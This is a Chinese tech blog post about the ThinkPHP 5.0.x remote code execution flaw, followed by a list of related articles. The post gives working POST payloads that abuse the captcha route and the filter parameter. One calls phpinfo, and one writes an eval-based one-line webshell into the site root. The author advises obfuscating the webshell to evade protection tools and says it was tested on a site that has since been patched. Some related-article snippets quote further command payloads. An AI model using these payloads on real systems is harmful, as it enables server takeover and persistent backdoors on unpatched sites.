Thinkphp5-0-X远程代码执行漏洞

最新推荐文章于 2024-08-07 18:27:39 发布
最新推荐文章于 2024-08-07 18:27:39 发布
阅读量980 收藏 1
点赞数
分类专栏: CVE&&漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40624810/article/details/109568465
版权

参考博客:https://www.cnblogs.com/303donatello/p/12721587.html

                  https://blog.csdn.net/qq_45521281/article/details/105907276

其实后面的&test=-1参数没有意义,只要有captcha就行

在post里加上我们要提交的参数

_method=__construct&filter[]=phpinfo&method=GET

提交前:

提交后:

证明了有远程代码执行漏洞,那怎么利用呢。可以参考文章开头的博客链接,了解filter参数的作用。

我们要利用远程代码执行写入webshell,当然目标可能有防护工具,建议写变形过的一句话。我们这里演示就用普通的一句话(其实是我不会写变形的一句话)

_method=__construct&filter[]=echo '<?php @eval($_POST["apple"]);?>' >>apple.php&method=GET

该语句的意义利用filter执行系统命令,在apple.php中写入一句话,熟悉thinkphp的同学一定知道它的目录结构。网站主页index.php在public目录下,我们这里写的apple.php会被保存在和index.php一级的目录。我们就可以直接www.xxx.com/apple.php进行验证了。这里没法验证,因为在写文章的时候发现人家已经修复了。但肯定能写进去的,在写文章之前就测试过了。

qq_40624810
关注
专栏目录
Thinkphp V5.X 远程代码执行漏洞 - POC(精:集群5.0*、5.1*、5.2*)
墨痕诉清风的博客
11-07 4521
官方公告:1、2、POC:批量检测单个检测。
php通用漏洞phpinfo,ThinkPHP5.0 captcha 调用phpinfo bug 远程代码执行漏洞解决方案
weixin_33778479的博客
03-11 669
漏洞可以直接远程代码执行,getshell提权写入网站木马到网站根目录,甚至直接提权到服务器,该漏洞影响版本ThinkPHP 5.0、ThinkPHP 5.0.10、ThinkPHP5.0.12、ThinkPHP5.0.13、ThinkPHP5.0.23、thinkphp 5.0.22版本。攻击者可以伪造远程恶意代码,利用漏洞对服务器进行post提交数据。首先打开网站会从app.php代码里将请...
ThinkPHP 5.x远程命令执行漏洞复现
WY92139010的博客
09-23 717
ThinkPHP 5.x远程命令执行漏洞复现 一、漏洞描述 2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞: https://blog.thinkphp.cn/869075 漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1。 ...
thinkphp5调用shell脚本_thinkphp5.x命令执行漏洞复现及环境搭建
weixin_42114046的博客
02-11 530
楼主Linux环境是Centos7,LAMP怎么搭不用我废话吧,别看错了1.安装composeryum -y install composer安装php拓展yum -y install php-mysql php-gd libjpeg* php-ldap php-odbc php-pear php-xml php-xmlrpc php-mbstring php-bcmath php-mhash -...
ThinkPHP 5.x 远程命令执行漏洞复现(GetShell)
热门推荐
北风
12-12 1万+
注:转载请注明出自:https://blog.csdn.net/qq_36711453/article/details/84977739 一、简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1...
Thinkphp5x远程执行命令及getshell
最新发布
2201_75891821的博客
08-07 624
靶场:vulhub/thinkphp/5-rcedocker-compose up -d #启动环境。
ThinkPHP5.0.x 远程代码执行
LYJ20010728的博客
08-16 1184
ThinkPHP5.0.x 远程代码执行漏洞概要初始配置漏洞利用漏洞分析漏洞修复攻击总结 漏洞概要 本次漏洞存在于 ThinkPHP 的缓存类中。该类会将缓存数据通过序列化的方式,直接存储在 .php 文件中,攻击者通过精心构造的 payload ,即可将 webshell 写入缓存文件。缓存文件的名字和目录均可预测出来,一旦缓存目录可访问或结合任意文件包含漏洞,即可触发 远程代码执行漏洞 漏洞影响版本: 5.0.0<=ThinkPHP5<=5.0.10 初始配置 获取测试环境代码
ThinkPHP历史漏洞复现
weixin_53747497的博客
03-05 1222
Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很多基于 thinkphp开发的网站。例如:KenCMS、ThinkCMF、DuxCMS、易优CMS。版本漏洞缓存函数设计缺陷可导致Getshell最新版update注入漏洞find_select_delete注入order_by注入漏洞sql注入漏洞
复现Thinkphp5 5.0.22/5.1.29远程代码执行漏洞
weixin_67813445的博客
03-15 709
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
ThinkPHP 5.0.23 远程代码执行漏洞(CVE-2018-20062)漏洞复现
千寻的博客
12-19 5473
文章目录漏洞名称漏洞编号漏洞描述影响版本实验环境及准备漏洞发现漏洞复现(数据包)漏洞复现(工具)修复建议摘抄免责声明 漏洞名称 ThinkPHP 5.0.23 远程代码执行漏洞 漏洞编号 CVE-2018-20062 漏洞描述 ThinkPHP是一款运用极广的PHP开发框架。 其5.0.23以前的版本中,获取method的方法中没有正确处理方法名, 导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在
ThinkPHP5 5.0.23 远程代码执行漏洞复现-分析
zeroc009的博客
02-15 1875
漏洞简述 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。 关键代码 @@ -522,8 +522,11 @@ public function method($method = false) return $this->server('REQUEST_METHOD') ?: 'GET'; } elseif (!
thinkphp5.x命令执行漏洞复现及环境搭建
05-27 1107
楼主Linux环境是Centos7,LAMP怎么搭不用我废话吧,别看错了 1.安装composer yum -y install composer 安装php拓展 yum -y install php-mysql php-gd libjpeg* php-ldap php-odbc php-pear php-xml php-xmlrpc php-mbstrin...
ThinkPHP 5.0.* 远程代码执行漏洞
公众号shadow sock7
01-16 7464
以5.0.23搭建环境。 payload如下: POST /thinkphp_5.0.23/public/index.php?s=captcha HTTP/1.1 Host: 192.168.170.186 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Geck...
thinkphp 源码分析系列(二)—— 路由
qq_41891666的博客
11-05 547
0x00 前言 这篇文章主要是结合 thinkphp 5.0.x 两个rce : (1)变量覆盖filter (2)没有开启强制路由导致rce 来分析thinkphp 的路由 0x01 路由检测 首先要说的是$dispatch 调度信息, 类似于: 调度信息最后会传入App::exec() 中: 而exec 会根据调度信息的type ,去调用相应的函数去映射到具体的函数上去执行。 App.php 中run() 函数中,$dispatch 是通过 App.php 中的routeCheck() 函数返回
Thinkphp5.0.23远程命令执行
Cover-3321的博客
01-03 2221
thinkphp远程命令执行漏洞 php的一个开发框架,5,0.23及以前的版本中,获取method的方法中没有正确处理方法 名,导致攻击者可以调用request类任意方法,构造payload,导致远程命令执行
复现ThinkPHP5 5.0.23远程代码执行漏洞
weixin_56513549的博客
02-21 3470
访问/index.php?s=captcha页面,会出现如下报错: 执行whoami 查看当前目录 _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd 写入一句话木马并访问 aaabbb 这里使用Base64 编码: _method=__construct&filter[]=system&method=get&server[RE...
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 9173
ThinkPHP5系列远程代码执行漏洞复现(详细)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值